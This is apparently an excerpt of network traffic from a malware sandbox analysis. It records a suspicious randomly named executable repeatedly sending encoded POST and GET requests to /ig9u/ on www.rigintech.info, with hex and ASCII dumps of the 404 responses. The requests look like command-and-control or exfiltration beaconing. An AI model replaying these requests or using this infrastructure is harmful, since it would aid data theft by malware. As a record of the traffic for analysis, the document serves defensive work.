                                                    Sep 5, 2024 14:25:52.601150990 CEST728OUTPOST /ig9u/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.rigintech.info
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.rigintech.info
                                                    Referer: http://www.rigintech.info/ig9u/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 4f 75 7a 35 45 31 59 56 63 44 4b 73 61 65 6e 49 55 38 48 75 4b 55 63 35 41 71 4d 71 6b 6f 61 34 34 4a 58 51 79 47 56 73 77 54 74 49 49 67 48 52 78 32 64 72 72 57 76 44 32 6b 44 75 43 50 79 59 4a 6a 30 39 68 6b 6d 64 2f 74 6a 73 65 63 30 4d 59 34 65 77 56 51 6a 6d 4f 59 54 6e 75 74 49 33 43 46 6c 59 4d 4b 4a 59 7a 7a 6c 70 78 62 55 51 45 31 61 79 59 79 79 48 43 32 69 65 56 49 6f 36 47 78 33 48 70 4d 59 62 5a 76 72 30 52 59 42 45 37 74 67 61 43 42 53 45 63 48 37 6c 6e 6a 45 56 4c 7a 2b 48 47 76 37 2f 47 66 69 55 71 35 4e 79 61 6f 70 2b 63 62 71 35 45 41 67 6e 59 55 58 48 32 52 65 31 4b 4e 61 4b 30 37 6b 4c 72 41 72 31 57 61 6c 58 2f 47 45 7a 45 56 68 42
                                                    Data Ascii: V6h=Ouz5E1YVcDKsaenIU8HuKUc5AqMqkoa44JXQyGVswTtIIgHRx2drrWvD2kDuCPyYJj09hkmd/tjsec0MY4ewVQjmOYTnutI3CFlYMKJYzzlpxbUQE1ayYyyHC2ieVIo6Gx3HpMYbZvr0RYBE7tgaCBSEcH7lnjEVLz+HGv7/GfiUq5Nyaop+cbq5EAgnYUXH2Re1KNaK07kLrAr1WalX/GEzEVhB
                                                    Sep 5, 2024 14:25:53.203957081 CEST1236INHTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Sep 2024 12:25:53 GMT
                                                    Server: Apache
                                                    Content-Length: 16052
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                    Sep 5, 2024 14:25:53.203984976 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                    Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                    Sep 5, 2024 14:25:53.203996897 CEST448INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                    Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                    Sep 5, 2024 14:25:53.204010010 CEST1236INData Raw: 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 30 33 2c 31 2e 35 30 33 36 35 20 2d 31 2e 36
                                                    Data Ascii: 68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,-0.76581 4.0014
                                                    Sep 5, 2024 14:25:53.204046011 CEST1236INData Raw: 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 37 31 20 2d 34 2e 37 35 30 33 31 35 2c 31 31
                                                    Data Ascii: 49655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,5
                                                    Sep 5, 2024 14:25:53.204056978 CEST448INData Raw: 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e 37 34 39 39 36 2c 31 32 2e 34 39 39 39 35 20
                                                    Data Ascii: 786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.4206
                                                    Sep 5, 2024 14:25:53.204076052 CEST1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                    Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                    Sep 5, 2024 14:25:53.204082966 CEST1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                    Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                    Sep 5, 2024 14:25:53.204088926 CEST448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                    Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                    Sep 5, 2024 14:25:53.204904079 CEST1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                    Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                    Sep 5, 2024 14:25:53.209186077 CEST1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                    Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.557206162.0.213.94802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:25:55.133116007 CEST1745OUTPOST /ig9u/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.rigintech.info
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.rigintech.info
                                                    Referer: http://www.rigintech.info/ig9u/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 4f 75 7a 35 45 31 59 56 63 44 4b 73 61 65 6e 49 55 38 48 75 4b 55 63 35 41 71 4d 71 6b 6f 61 34 34 4a 58 51 79 47 56 73 77 53 56 49 49 56 54 52 6a 48 64 72 35 47 76 44 6f 55 43 70 43 50 79 2f 4a 6a 39 31 68 6b 36 72 2f 75 62 73 63 2b 73 4d 4a 70 65 77 62 67 6a 6d 57 6f 54 6d 77 64 4a 33 43 46 31 55 4d 4f 56 59 7a 7a 6c 70 78 59 4d 51 4e 41 36 79 61 79 79 45 48 47 69 4b 65 6f 6f 65 47 78 2b 79 70 4d 63 6c 5a 66 4c 30 52 34 52 45 72 50 59 61 64 52 53 38 66 48 37 4c 6e 69 35 4c 4c 33 6e 34 47 73 6e 56 47 64 79 55 76 2f 51 6b 43 73 30 6d 4e 74 37 62 4a 69 6b 78 48 52 6e 43 39 68 36 6d 50 65 69 76 32 37 38 44 70 6b 6e 6c 66 36 59 4c 6f 33 4a 68 55 68 77 62 58 51 31 50 57 78 48 76 2f 56 36 4a 62 61 55 4b 77 43 4d 4a 61 69 50 49 6c 31 6b 49 4b 6a 47 42 59 54 72 45 53 39 4d 50 68 75 64 43 44 55 4f 64 75 61 69 63 74 2f 47 72 76 37 51 31 43 78 4e 51 36 46 2f 56 46 74 46 45 77 6a 4e 58 36 4d 4f 46 59 34 4c 6f 6d 63 34 38 4b 71 34 30 77 56 6d 2f 37 30 65 56 58 39 37 39 54 51 75 72 42 46 66 65 49 6f [TRUNCATED]
                                                    Data Ascii: V6h=Ouz5E1YVcDKsaenIU8HuKUc5AqMqkoa44JXQyGVswSVIIVTRjHdr5GvDoUCpCPy/Jj91hk6r/ubsc+sMJpewbgjmWoTmwdJ3CF1UMOVYzzlpxYMQNA6yayyEHGiKeooeGx+ypMclZfL0R4RErPYadRS8fH7Lni5LL3n4GsnVGdyUv/QkCs0mNt7bJikxHRnC9h6mPeiv278Dpknlf6YLo3JhUhwbXQ1PWxHv/V6JbaUKwCMJaiPIl1kIKjGBYTrES9MPhudCDUOduaict/Grv7Q1CxNQ6F/VFtFEwjNX6MOFY4Lomc48Kq40wVm/70eVX979TQurBFfeIoqgMWzsxdTRyGJSTBTAW6848apqB7OowsAgl8KCJY7z+rTxAb4WCah4boX3UtYY6dszBeszMs93Nni2KFH0dc7ssZ7G8lewRAl2KrO3RRlgtMc3Pv27U3HTNw2cLsUOSU0r/l77kWGP/Mo4WxMEooFOtVeqdYpU3rjtVVgw2J63CdoIo5d6UvfmvToGHz6hjwj806KP6x8+mmWIxaMchiG4Ac/OWr8GFE+p9fgugTRO5/2yYMG9nTRxBU0Zkz983SwxBlm1q+ZZ5wkBQxJwW1BfnqUHaznOdzoPDj/9iTcJUqLwxIN4/vo/EIm8fu2+xPPKNB/YQdinI/3zLGxA9IBJLm7EhTKj/KevYVE08T+vwKj65FCnrpn/mfJEHh+H+hATQeEdSdzTWS1MSFad7c1yDlKUjyAawhPPZ+nlmxq6TJEdCaCFoZO0/jDuJnA+56wqSGAjHjss52ecDzr7BfmYvRW/6G7GsNkTRRIaMvs/q3cEcKrsY8X+mXIMIRmanS7m+1/6jIwOgSSrmg/VLq7el4mvisumHc9Rn65Wa2Zi4jbGD8WQie5PNGd2cGjRfSHQVxiX8WgguLEaHilHX52+TLNIGWzKQIj3fkry0Q/LeFS3XJJErZuKAaHWKsMHPDa9OFp5et46fXhLQMxjjDB/Ct0dfYwNToMJ [TRUNCATED]
                                                    Sep 5, 2024 14:25:55.738493919 CEST1236INHTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Sep 2024 12:25:55 GMT
                                                    Server: Apache
                                                    Content-Length: 16052
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                    Sep 5, 2024 14:25:55.738517046 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                    Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                    Sep 5, 2024 14:25:55.738528967 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                    Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                    Sep 5, 2024 14:25:55.738539934 CEST672INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                    Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                    Sep 5, 2024 14:25:55.738567114 CEST1236INData Raw: 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33 2e 34 31 37 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30
                                                    Data Ascii: 5.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4517" d="m 76.9375,124.6
                                                    Sep 5, 2024 14:25:55.738584042 CEST1236INData Raw: 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33 2c 33 38 2e 39 39 38 30 39 20 2d 33 2e 36 30 34 34 38 2c 31 34 2e 36 36 31 37 37 20 2d 38 2e 30 36 32 31 32 2c 33 31 2e 31 37 31 35 34 20 2d 31 32 2e 35 36 32 34 34 2c 34 37 2e 38 33 39
                                                    Data Ascii: 16,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                    Sep 5, 2024 14:25:55.738595963 CEST1236INData Raw: 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 33 37 22 0a 20 20 20
                                                    Data Ascii: inejoin:miter;stroke-opacity:1;" /> <path id="path4537" d="m 87.0625,123.03748 c 2.916637,10.42937 5.833458,20.8594 7.291964,26.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.82
                                                    Sep 5, 2024 14:25:55.738605022 CEST104INData Raw: 20 2d 35 2e 30 37 34 39 37 35 2c 32 36 2e 30 33 34 38 33 20 2d 31 2e 31 31 39 35 36 38 2c 35 2e 38 39 32 36 34 20 2d 31 2e 35 39 30 39 32 2c 37 2e 37 37 38 30 35 20 2d 31 2e 38 38 35 37 30 38 2c 31 30 2e 30 37 37 30 36 20 2d 30 2e 32 39 34 37 38
                                                    Data Ascii: -5.074975,26.03483 -1.119568,5.89264 -1.59092,7.77805 -1.885708,10.07706 -0.294789,2.29901 -0.412567,5.
                                                    Sep 5, 2024 14:25:55.738615990 CEST1236INData Raw: 30 30 37 39 20 35 2e 31 65 2d 35 2c 31 37 2e 35 36 33 33 39 20 30 2e 34 31 32 36 31 37 2c 31 32 2e 35 35 35 34 38 20 31 2e 33 35 35 30 36 34 2c 33 34 2e 39 33 38 35 39 20 32 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33
                                                    Data Ascii: 0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:
                                                    Sep 5, 2024 14:25:55.738629103 CEST224INData Raw: 32 35 31 20 36 2e 31 32 38 38 35 2c 2d 31 2e 32 33 37 37 34 20 39 2e 31 39 31 38 2c 2d 32 2e 30 36 32 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                    Data Ascii: 251 6.12885,-1.23774 9.1918,-2.06238" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560"
                                                    Sep 5, 2024 14:25:55.743557930 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 2e 31 31 33 31 39 39 2c 31 39 38 2e 31 36 38 32 31 20 63 20 34 37 2e 35 34 37 30 33 38 2c 30 2e 34 30 33 36 31 20 39 35 2e 30 39 33 30 37 31 2c 30 2e 38 30 37 32 31 20 31 34 32 2e 36 33 38 31
                                                    Data Ascii: d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;stroke:#000000;stroke-width:1.00614154px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.557207162.0.213.94802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:25:57.665898085 CEST449OUTGET /ig9u/?V6h=DsbZHDl7ETyucOGSRMDREU0gLqon/JCM1qPnn3cy3RxLEFGk9lVuu2W6wSDxGu+YER8koFm75cmrGcIzTbmZQ3LhDYrene07E1oxIZlh9GtUu7RZMRKLFDCiJnSgV5dMHg==&sH=nVVHdDTx2PSTVJ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.rigintech.info
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:25:58.268325090 CEST1236INHTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Sep 2024 12:25:58 GMT
                                                    Server: Apache
                                                    Content-Length: 16052
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                    Sep 5, 2024 14:25:58.268467903 CEST1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
